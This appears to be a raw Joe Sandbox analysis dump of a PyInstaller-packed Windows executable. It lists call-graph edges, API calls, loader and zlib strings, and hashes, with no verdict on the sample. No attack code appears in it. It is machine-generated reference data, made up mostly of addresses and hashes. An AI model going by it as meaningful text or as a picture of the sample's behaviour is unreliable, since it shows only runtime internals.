20840->20841 20844 7ff652eeb700 __free_lconv_mon 11 API calls 20841->20844 20842 7ff652ee9eb3 20845 7ff652eeb700 __free_lconv_mon 11 API calls 20842->20845 20843 7ff652ee9e91 20843->20842 20846 7ff652ee9edf 20843->20846 20847 7ff652ee9ef8 20843->20847 20844->20830 20845->20830 20848 7ff652eeb700 __free_lconv_mon 11 API calls 20846->20848 20849 7ff652eeb700 __free_lconv_mon 11 API calls 20847->20849 20850 7ff652ee9ee8 20848->20850 20849->20842 20851 7ff652eeb700 __free_lconv_mon 11 API calls 20850->20851 20851->20830 20854 7ff652edc75f 20853->20854 20855 7ff652edc766 20853->20855 20854->20827 20857 7ff652eeaf9c 20855->20857 20860 7ff652eeabd8 20857->20860 20867 7ff652ef11a8 EnterCriticalSection 20860->20867 
20869 7ff652ee9d80 20868->20869 20870 7ff652ee9db8 20868->20870 20869->20870 20871 7ff652eef948 _get_daylight 11 API calls 20869->20871 20870->20839 20870->20843 20872 7ff652ee9dae 20871->20872 20873 7ff652eeb700 __free_lconv_mon 11 API calls 20872->20873 20873->20870 16509 7ff652ef04dc 16510 7ff652ef06ce 16509->16510 16512 7ff652ef051e _isindst 16509->16512 16511 7ff652ee5cb4 _get_daylight 11 API calls 16510->16511 16527 7ff652ef06be 16511->16527 16512->16510 16515 7ff652ef059e _isindst 16512->16515 16513 7ff652edc010 _wfindfirst32i64 8 API calls 16514 7ff652ef06e9 16513->16514 16530 7ff652ef70e4 16515->16530 16520 7ff652ef06fa 16522 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16520->16522 16524 7ff652ef070e 16522->16524 16527->16513 16528 7ff652ef05fb 16528->16527 16554 7ff652ef7128 16528->16554 16531 7ff652ef70f3 16530->16531 16535 7ff652ef05bc 16530->16535 16561 7ff652ef11a8 EnterCriticalSection 16531->16561 16536 7ff652ef64e8 16535->16536 16537 7ff652ef64f1 16536->16537 16538 7ff652ef05d1 16536->16538 16539 7ff652ee5cb4 _get_daylight 11 API calls 16537->16539 16538->16520 16542 7ff652ef6518 16538->16542 16540 7ff652ef64f6 16539->16540 16541 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16540->16541 16541->16538 16543 7ff652ef6521 16542->16543 16544 7ff652ef05e2 16542->16544 16545 7ff652ee5cb4 _get_daylight 11 API calls 16543->16545 16544->16520 16548 7ff652ef6548 16544->16548 16546 7ff652ef6526 16545->16546 16547 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16546->16547 16547->16544 16549 7ff652ef6551 16548->16549 16550 7ff652ef05f3 16548->16550 16551 7ff652ee5cb4 _get_daylight 11 API calls 16549->16551 16550->16520 16550->16528 16552 7ff652ef6556 16551->16552 16553 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16552->16553 16553->16550 16562 7ff652ef11a8 EnterCriticalSection 16554->16562 19486 7ff652edb2dc 19488 7ff652eda5da 19486->19488 19487 7ff652eda656 19488->19487 19490 7ff652edb850 19488->19490 19491 7ff652edb873 19490->19491 19492 
17763 7ff652ee1932 17760->17763 17766 7ff652ee1d05 17761->17766 17768 7ff652ee5cb4 _get_daylight 11 API calls 17761->17768 17764 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17762->17764 17765 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17763->17765 17771 7ff652ee193d 17764->17771 17765->17771 17767 7ff652ee5cb4 _get_daylight 11 API calls 17766->17767 17766->17771 17769 7ff652ee1f99 17767->17769 17770 7ff652ee1cfa 17768->17770 17772 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17769->17772 17773 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17770->17773 17771->17606 17772->17771 17773->17766 17775 7ff652ed7b76 17774->17775 17776 7ff652ed7b9a 17775->17776 17777 7ff652ed7bed GetTempPathW 17775->17777 17778 7ff652ed7d70 61 API calls 17776->17778 17779 7ff652ed7c02 17777->17779 17780 7ff652ed7ba6 17778->17780 17813 7ff652ed2810 17779->17813 17825 7ff652ed7630 17780->17825 17790 7ff652ed7c1b __std_exception_destroy 17791 7ff652ed7cc6 17790->17791 17796 7ff652ed7c51 17790->17796 17817 7ff652ee92c8 17790->17817 17820 7ff652ed8d80 17790->17820 17798 7ff652ed8de0 57 API calls 17796->17798 17811 7ff652ed7c8a __std_exception_destroy 17796->17811 17814 7ff652ed2835 17813->17814 17815 7ff652ee5508 48 API calls 17814->17815 17816 7ff652ed2854 17815->17816 17816->17790 17859 7ff652ee8ef4 17817->17859 17821 7ff652ed8d90 17820->17821 17822 7ff652ed8da6 CreateDirectoryW 17820->17822 17822->17790 17826 7ff652ed763c 17825->17826 17827 7ff652ed8de0 57 API calls 17826->17827 17828 7ff652ed765e 17827->17828 17829 7ff652ed7666 17828->17829 17830 7ff652ed7679 ExpandEnvironmentStringsW 17828->17830 17831 7ff652ed2b10 59 API calls 17829->17831 17832 7ff652ed769f __std_exception_destroy 17830->17832 18098 7ff652ed172e 18097->18098 18099 7ff652ed1716 18097->18099 18101 7ff652ed1734 18098->18101 18102 7ff652ed1758 18098->18102 18100 7ff652ed2b10 59 API calls 18099->18100 18104 7ff652ed1722 18100->18104 18227 7ff652ed12a0 18101->18227 18190 7ff652ed7e20 18102->18190 
18104->16847 18108 7ff652ed177d 18111 7ff652ed2870 59 API calls 18108->18111 18109 7ff652ed17a9 18112 7ff652ed4060 116 API calls 18109->18112 18110 7ff652ed174f 18110->16847 18114 7ff652ed1793 18111->18114 18115 7ff652ed17be 18112->18115 18113 7ff652ed2b10 59 API calls 18113->18110 18114->16847 18116 7ff652ed17de 18115->18116 18117 7ff652ed17c6 18115->18117 18119 7ff652ee1004 73 API calls 18116->18119 18118 7ff652ed2b10 59 API calls 18117->18118 18120 7ff652ed17d5 18118->18120 18121 7ff652ed17ef 18119->18121 18125 7ff652ee097c 74 API calls 18120->18125 18122 7ff652ed1813 18121->18122 18123 7ff652ed17f3 18121->18123 18140 7ff652ed2d66 18139->18140 18141 7ff652ed1ee0 49 API calls 18140->18141 18142 7ff652ed2d99 18141->18142 18143 7ff652ed3e80 49 API calls 18142->18143 18170 7ff652ed30ca 18142->18170 18144 7ff652ed2e07 18143->18144 18145 7ff652ed3e80 49 API calls 18144->18145 18146 7ff652ed2e18 18145->18146 18147 7ff652ed2e75 18146->18147 18148 7ff652ed2e39 18146->18148 18149 7ff652ed3190 75 API calls 18147->18149 18349 7ff652ed3190 18148->18349 18151 7ff652ed2e73 18149->18151 18152 7ff652ed2eb4 18151->18152 18153 7ff652ed2ef6 18151->18153 18357 7ff652ed77b0 18152->18357 18155 7ff652ed3190 75 API calls 18153->18155 18157 7ff652ed2f20 18155->18157 18161 7ff652ed3190 75 API calls 18157->18161 18167 7ff652ed2fbc 18157->18167 18164 7ff652ed2f52 18161->18164 18162 7ff652ed1ea0 59 API calls 18165 7ff652ed300f 18162->18165 18164->18167 18168 7ff652ed3190 75 API calls 18164->18168 18165->18170 18167->18162 18183 7ff652ed30cf 18167->18183 18181 7ff652ed3128 18183->18181 18394 7ff652ee5860 18183->18394 18191 7ff652ed7e30 18190->18191 18192 7ff652ed1ee0 49 API calls 18191->18192 18193 7ff652ed7e71 18192->18193 18194 7ff652ed7ef1 18193->18194 18270 7ff652ed3ff0 18193->18270 18196 7ff652edc010 _wfindfirst32i64 8 API calls 18194->18196 18198 7ff652ed1775 18196->18198 18198->18108 18198->18109 18199 7ff652ed7f2b 18276 7ff652ed79d0 18199->18276 18201 7ff652ed7d70 61 API calls 18206 
7ff652ed7ea2 __std_exception_destroy 18201->18206 18203 7ff652ed7ee0 18207 7ff652ed2c30 59 API calls 18203->18207 18204 7ff652ed7f14 18205 7ff652ed2c30 59 API calls 18204->18205 18205->18199 18206->18203 18206->18204 18207->18194 18228 7ff652ed12b2 18227->18228 18229 7ff652ed4060 116 API calls 18228->18229 18230 7ff652ed12e2 18229->18230 18231 7ff652ed1301 18230->18231 18232 7ff652ed12ea 18230->18232 18234 7ff652ee1004 73 API calls 18231->18234 18233 7ff652ed2b10 59 API calls 18232->18233 18239 7ff652ed12fa __std_exception_destroy 18233->18239 18235 7ff652ed1313 18234->18235 18236 7ff652ed133d 18235->18236 18237 7ff652ed1317 18235->18237 18241 7ff652ed1380 18236->18241 18242 7ff652ed1358 18236->18242 18238 7ff652ed2870 59 API calls 18237->18238 18240 7ff652ed132e 18238->18240 18243 7ff652edc010 _wfindfirst32i64 8 API calls 18239->18243 18244 7ff652ee097c 74 API calls 18240->18244 18246 7ff652ed1453 18241->18246 18247 7ff652ed139a 18241->18247 18245 7ff652ed2870 59 API calls 18242->18245 18248 7ff652ed1444 18243->18248 18244->18239 18249 7ff652ed1373 18245->18249 18254 7ff652ee0ccc _fread_nolock 53 API calls 18246->18254 18259 7ff652ed14ab 18246->18259 18260 7ff652ed13b3 18246->18260 18250 7ff652ed1050 98 API calls 18247->18250 18248->18110 18248->18113 18251 7ff652ee097c 74 API calls 18249->18251 18252 7ff652ed13ab 18250->18252 18251->18239 18255 7ff652ed14c2 __std_exception_destroy 18252->18255 18252->18260 18253 7ff652ee097c 74 API calls 18256 7ff652ed13bf 18253->18256 18254->18246 18262 7ff652ee097c 74 API calls 18255->18262 18257 7ff652ed79d0 64 API calls 18256->18257 18261 7ff652ed2870 59 API calls 18259->18261 18260->18253 18261->18255 18262->18239 18271 7ff652ed3ffa 18270->18271 18272 7ff652ed8de0 57 API calls 18271->18272 18273 7ff652ed4022 18272->18273 18274 7ff652edc010 _wfindfirst32i64 8 API calls 18273->18274 18275 7ff652ed404a 18274->18275 18275->18199 18275->18201 18275->18206 18277 7ff652ed79e0 18276->18277 18278 7ff652ed1ee0 49 API calls 
18277->18278 18350 7ff652ed31c4 18349->18350 18351 7ff652ee52b4 49 API calls 18350->18351 18352 7ff652ed31ea 18351->18352 18353 7ff652ed31fb 18352->18353 18409 7ff652ee65dc 18352->18409 18355 7ff652edc010 _wfindfirst32i64 8 API calls 18353->18355 18356 7ff652ed3219 18355->18356 18356->18151 18358 7ff652ed77be 18357->18358 18359 7ff652ed4060 116 API calls 18358->18359 18360 7ff652ed77ed 18359->18360 18410 7ff652ee6605 18409->18410 18411 7ff652ee65f9 18409->18411 18451 7ff652ee5788 18410->18451 18426 7ff652ee5ef0 18411->18426 18452 7ff652ee57ac 18451->18452 18453 7ff652ee57a7 18451->18453 18452->18453 18669 7ff652ee6918 18667->18669 18668 7ff652ee693e 18670 7ff652ee5cb4 _get_daylight 11 API calls 18668->18670 18669->18668 18672 7ff652ee6971 18669->18672 18671 7ff652ee6943 18670->18671 18673 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 18671->18673 18674 7ff652ee6984 18672->18674 18675 7ff652ee6977 18672->18675 18677 7ff652ed40b9 18673->18677 18686 7ff652eeb9e0 18674->18686 18678 7ff652ee5cb4 _get_daylight 11 API calls 18675->18678 18677->16922 18678->18677 18699 7ff652ef11a8 EnterCriticalSection 18686->18699 19047 7ff652ee98c4 19046->19047 19050 7ff652ee93a0 19047->19050 19051 7ff652ee93ea 19050->19051 19052 7ff652ee93bb 19050->19052 19060 7ff652ee5b5c EnterCriticalSection 19051->19060 19053 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 19052->19053 19056 7ff652ee93db 19053->19056 19062 7ff652ee0773 19061->19062 19063 7ff652ee07a1 19061->19063 19064 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 19062->19064 19070 7ff652ee0793 19063->19070 19064->19070 19073 7ff652ed4060 116 API calls 19072->19073 19074 7ff652ed15b7 19073->19074 19075 7ff652ed15bf 19074->19075 19076 7ff652ed15e0 19074->19076 19077 7ff652ed2b10 59 API calls 19075->19077 19078 7ff652ee1004 73 API calls 19076->19078 19079 7ff652ed15cf 19077->19079 19080 7ff652ed15f1 19078->19080 19079->16941 19081 7ff652ed15f5 19080->19081 19082 7ff652ed1611 19080->19082 19083 7ff652ed2870 59 API calls 
19081->19083 19084 7ff652ed1641 19082->19084 19085 7ff652ed1621 19082->19085 19093 7ff652ed160c __std_exception_destroy 19083->19093 19086 7ff652ed1656 19084->19086 19092 7ff652ed166d 19084->19092 19088 7ff652ed2870 59 API calls 19085->19088 19089 7ff652ed1050 98 API calls 19086->19089 19087 7ff652ee097c 74 API calls 19090 7ff652ed16e7 19087->19090 19088->19093 19089->19093 19090->16941 19091 7ff652ee0ccc _fread_nolock 53 API calls 19091->19092 19092->19091 19092->19093 19094 7ff652ed16ae 19092->19094 19093->19087 19095 7ff652ed2870 59 API calls 19094->19095 19095->19093 19097 7ff652ed19c3 19096->19097 19099 7ff652ed195f 19096->19099 19097->16954 19098 7ff652ee5860 45 API calls 19098->19099 19099->19097 19099->19098 19101 7ff652ed8de0 57 API calls 19100->19101 19102 7ff652ed8487 LoadLibraryExW 19101->19102 19103 7ff652ed84a4 __std_exception_destroy 19102->19103 19103->16968 19105 7ff652ed714c GetProcAddress 19104->19105 19110 7ff652ed7129 19104->19110 19105->19110 19164 7ff652ed5de0 19163->19164 19165 7ff652ed1ee0 49 API calls 19164->19165 19166 7ff652ed5e12 19165->19166 19167 7ff652ed5e3b 19166->19167 19168 7ff652ed5e1b 19166->19168 19170 7ff652ed5e92 19167->19170 19171 7ff652ed4140 49 API calls 19167->19171 19169 7ff652ed2b10 59 API calls 19168->19169 19190 7ff652ed5e31 19169->19190 19172 7ff652ed4140 49 API calls 19170->19172 19175 7ff652ed5e5c 19171->19175 19173 7ff652ed5eab 19172->19173 19174 7ff652ed5ec9 19173->19174 19178 7ff652ed2b10 59 API calls 19173->19178 19179 7ff652ed8470 58 API calls 19174->19179 19176 7ff652ed5e7a 19175->19176 19180 7ff652ed2b10 59 API calls 19175->19180 19181 7ff652ed3ff0 57 API calls 19176->19181 19177 7ff652edc010 _wfindfirst32i64 8 API calls 19182 7ff652ed344e 19177->19182 19178->19174 19183 7ff652ed5ed6 19179->19183 19180->19176 19184 7ff652ed5e84 19181->19184 19182->16989 19191 7ff652ed5f30 19182->19191 19185 7ff652ed5edb 19183->19185 19186 7ff652ed5efd 19183->19186 19184->19170 19189 7ff652ed8470 58 API calls 19184->19189 
19187 7ff652ed29c0 57 API calls 19185->19187 19261 7ff652ed53f0 GetProcAddress 19186->19261 19187->19190 19189->19170 19190->19177 19345 7ff652ed4ff0 19191->19345 19193 7ff652ed5f54 19194 7ff652ed5f5c 19193->19194 19195 7ff652ed5f6d 19193->19195 19262 7ff652ed5412 19261->19262 19263 7ff652ed5430 GetProcAddress 19261->19263 19265 7ff652ed29c0 57 API calls 19262->19265 19263->19262 19264 7ff652ed5455 GetProcAddress 19263->19264 19264->19262 19266 7ff652ed547a GetProcAddress 19264->19266 19267 7ff652ed5425 19265->19267 19266->19262 19267->19190 19347 7ff652ed5015 19345->19347 19346 7ff652ed501d 19346->19193 19347->19346 19350 7ff652ed51af 19347->19350 19387 7ff652ee74f4 19347->19387 19348 7ff652ed535a __std_exception_destroy 19348->19193 19349 7ff652ed4450 47 API calls 19349->19350 19350->19348 19350->19349 19388 7ff652ee7524 19387->19388 19391 7ff652ee69f0 19388->19391 19618 7ff652edb1cc 19619 7ff652eda5d3 19618->19619 19621 7ff652eda656 19618->19621 19620 7ff652edb850 12 API calls 19619->19620 19619->19621 19620->19621

                                                    Control-flow Graph
                                                    • Interactive graph (executed / not executed paths); edge data not reproduced
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2647325126-1544818733
                                                    • Opcode ID: 7e818fdf10d144ebf1a2c27805d4b093fd68b8386923d87f4e33e82801278a2a
                                                    • Instruction ID: 30eb35b29fe95acb9b4af5a3f1753b8972b06d32ed22afa375d05d3310b9ddf2
                                                    • Opcode Fuzzy Hash: 7e818fdf10d144ebf1a2c27805d4b093fd68b8386923d87f4e33e82801278a2a
                                                    • Instruction Fuzzy Hash: 9DC19422B0C66741EB29EB21AC512BD6351BFC578CF48113DEA4DE7696DFACE9058B00

                                                    Control-flow Graph
                                                    • Interactive graph (executed / not executed paths); edge data not reproduced
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6B95
                                                      • Part of subcall function 00007FF652EF64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF64FC
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                      • Part of subcall function 00007FF652EEB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF652EEB697,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEB6C1
                                                      • Part of subcall function 00007FF652EEB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF652EEB697,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEB6E6
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6B84
                                                      • Part of subcall function 00007FF652EF6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF655C
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6DFA
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E0B
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E1C
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF652EF705C), ref: 00007FF652EF6E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                    • API String ID: 4070488512-239921721
                                                    • Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                    • Instruction ID: 202c4161804df161e493aad559183d23e40ad0e64538e36a9cff3fab8070847a
                                                    • Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                    • Instruction Fuzzy Hash: E0D1D362A0826286EB24AF22FC511BA7361FF4579CF48413DEA5DE7A95DFBCE441C340

                                                    Control-flow Graph
                                                    • Interactive graph (executed / not executed paths); edge data not reproduced
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                    • Instruction ID: 3d0ac4637c27dae2a3fb30f06939d0707fdee7fd11ed1f445748475436735d20
                                                    • Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                    • Instruction Fuzzy Hash: 27C1DF37B28A5285EB10CF64D8906BD3761EB49B9CF181239DA2EAB7D4DF78D456C300

                                                    Control-flow Graph

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF652ED153F), ref: 00007FF652ED7BF7
                                                      • Part of subcall function 00007FF652ED7D70: GetEnvironmentVariableW.KERNEL32(00007FF652ED39FF), ref: 00007FF652ED7DAA
                                                      • Part of subcall function 00007FF652ED7D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF652ED7DC7
                                                      • Part of subcall function 00007FF652EE8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EE8629
                                                    • SetEnvironmentVariableW.KERNEL32 ref: 00007FF652ED7CB1
                                                      • Part of subcall function 00007FF652ED2B10: MessageBoxW.USER32 ref: 00007FF652ED2BE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: 8ca8b3c2351723dac4712d3aa85941f8869fc0faa47b2209596cb44ab2a1f07c
                                                    • Instruction ID: f1599c03a14ea12c6bc8bcc6ff900306f20bc79c6891fd3a42c778eecbfdb23d
                                                    • Opcode Fuzzy Hash: 8ca8b3c2351723dac4712d3aa85941f8869fc0faa47b2209596cb44ab2a1f07c
                                                    • Instruction Fuzzy Hash: FD514C11B0967345FF65A722AD162BA52416FCABC8F4C543DED0EEB7D7EDACE4028240
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                    • API String ID: 0-2665694366
                                                    • Opcode ID: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                    • Instruction ID: 1d97d6dea635e32bd889a9ca5b35b1bd72317f5c69dee174aa75be7505b325a3
                                                    • Opcode Fuzzy Hash: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                    • Instruction Fuzzy Hash: A652E672A146B68BD7648F14D858B7E3BA9FB84344F09413DEA4A97780DFBCE944CB40

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 957 7ff652ef6dcc-7ff652ef6e01 call 7ff652ef64d8 call 7ff652ef64e0 call 7ff652ef6548 964 7ff652ef6f3f-7ff652ef6fad call 7ff652eeb6b8 call 7ff652ef23d0 957->964 965 7ff652ef6e07-7ff652ef6e12 call 7ff652ef64e8 957->965 977 7ff652ef6faf-7ff652ef6fb6 964->977 978 7ff652ef6fbb-7ff652ef6fbe 964->978 965->964 970 7ff652ef6e18-7ff652ef6e23 call 7ff652ef6518 965->970 970->964 976 7ff652ef6e29-7ff652ef6e4c call 7ff652eeb700 GetTimeZoneInformation 970->976 987 7ff652ef6f14-7ff652ef6f3e call 7ff652ef64d0 call 7ff652ef64c0 call 7ff652ef64c8 976->987 988 7ff652ef6e52-7ff652ef6e73 976->988 982 7ff652ef704b-7ff652ef704e 977->982 980 7ff652ef6ff5-7ff652ef7008 call 7ff652eee3ac 978->980 981 7ff652ef6fc0 978->981 993 7ff652ef7013-7ff652ef702e call 7ff652ef23d0 980->993 994 7ff652ef700a 980->994 984 7ff652ef6fc3 981->984 982->984 986 7ff652ef7054-7ff652ef705c call 7ff652ef6b50 982->986 989 7ff652ef6fc8-7ff652ef6ff4 call 7ff652eeb700 call 7ff652edc010 984->989 990 7ff652ef6fc3 call 7ff652ef6dcc 984->990 986->989 996 7ff652ef6e75-7ff652ef6e7b 988->996 997 7ff652ef6e7e-7ff652ef6e85 988->997 990->989 1013 7ff652ef7035-7ff652ef7047 call 7ff652eeb700 993->1013 1014 7ff652ef7030-7ff652ef7033 993->1014 1000 7ff652ef700c-7ff652ef7011 call 7ff652eeb700 994->1000 996->997 1002 7ff652ef6e99 997->1002 1003 7ff652ef6e87-7ff652ef6e8f 997->1003 1000->981 1010 7ff652ef6e9b-7ff652ef6f0f call 7ff652efb580 * 4 call 7ff652ef39ac call 7ff652ef7064 * 2 1002->1010 1003->1002 1008 7ff652ef6e91-7ff652ef6e97 1003->1008 1008->1010 1010->987 1013->982 1014->1000
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6DFA
                                                      • Part of subcall function 00007FF652EF6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF655C
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E0B
                                                      • Part of subcall function 00007FF652EF64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF64FC
                                                    • _get_daylight.LIBCMT ref: 00007FF652EF6E1C
                                                      • Part of subcall function 00007FF652EF6518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF652EF652C
                                                      • Part of subcall function 00007FF652EEB700: RtlFreeHeap.NTDLL(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB716
                                                      • Part of subcall function 00007FF652EEB700: GetLastError.KERNEL32(?,?,?,00007FF652EF3B72,?,?,?,00007FF652EF3BAF,?,?,00000000,00007FF652EF4075,?,?,00000000,00007FF652EF3FA7), ref: 00007FF652EEB720
                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF652EF705C), ref: 00007FF652EF6E43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
